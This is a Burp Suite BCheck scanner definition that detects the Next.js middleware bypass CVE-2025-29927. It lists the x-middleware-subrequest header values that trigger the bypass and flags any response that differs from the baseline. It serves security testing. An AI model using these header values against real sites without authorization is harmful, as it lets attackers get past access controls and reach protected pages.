Burp BCheck for CVE-2025-29927 (Next.js middleware bypass)

CVE-2025-29927.bcheck

metadata:
    language: v2-beta
    name: "CVE-2025-29927 - Next.js middleware bypass"
    description: "Checks for differences in responses when using different x-middleware-subrequest header paths"
    author: "Chris Grieger - blueredix.com"
    tags: "next.js", "middleware"

run for each:
    middleware_value = "pages/_middleware",
                       "middleware",
                       "src/middleware",
                       "middleware:middleware:middleware:middleware:middleware", 
                       "src/middleware:src/middleware:src/middleware:src/middleware:src/middleware"

given request then
    send request called check:
        headers: 
            "x-middleware-subrequest": {middleware_value}
    if not({base.response.status_code} is {check.response.status_code}) or
       {base.response} differs from {check.response}
        then
            report issue:
                severity: high
                confidence: firm
                detail: "Different response detected when using a specific value for the in x-middleware-subrequest header."
                remediation: "The application responds differently when sending a request with the x-middleware-subrequest header. This could potentially be used to bypass middleware protections."
    end if